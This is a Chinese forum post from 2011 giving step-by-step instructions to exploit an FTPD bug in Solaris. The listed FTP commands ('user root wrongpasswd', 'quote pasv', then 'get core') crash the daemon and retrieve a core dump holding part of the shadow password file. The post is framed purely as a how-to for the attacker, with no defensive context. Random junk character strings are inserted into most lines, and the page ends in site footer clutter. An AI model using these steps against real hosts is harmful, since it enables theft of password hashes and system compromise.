該方法利用了Solaris 操作系統(tǒng)中FTPD的一個BUG�����,使得用戶可以獲得該機的口令文件��。具體過程如下:- S, [; G1 u4 z/ E: ]6 w" @
; U: W, M/ y0 C+ k* c
1.通過 ftp 正常登錄到目的主機上
* t5 D2 T9 s4 L& L ]* X
, N( T+ E0 W2 q; s2.輸入如下命令序列:
2 \0 c3 i/ ~: H& r4 m# k4 X4 S/ E7 T& H; C
ftp> user root wrongpasswd
! t, p: @+ F2 s# M4 B; }! @* P
% j: U: r& x" P# b. q3 A+ Kftp> quote pasv
: k8 i5 r" Q, [ u/ b" [8 }" e/ d( O( ]
3.這時�,ftpd會報錯退出��,同時會在當(dāng)前目錄下生成一個core���,口令文件就包含在這個core中�����。" _1 w# N% w2 C! y
7 Y ^6 @9 A. ^4.再次進入FTP >get core
& H: H' z. o- @ y* ]2 w, u% e1 D% Q! e
補充:雖然在core只有一部分shadow�����,但是對于系統(tǒng)來說已經(jīng)是致命的打擊了
$ g1 y* z! p; R7 D9 `2 r4 H; W% [
|
|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機版|小黑屋|汶上信息港
( 魯ICP備19052200號-1 )
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡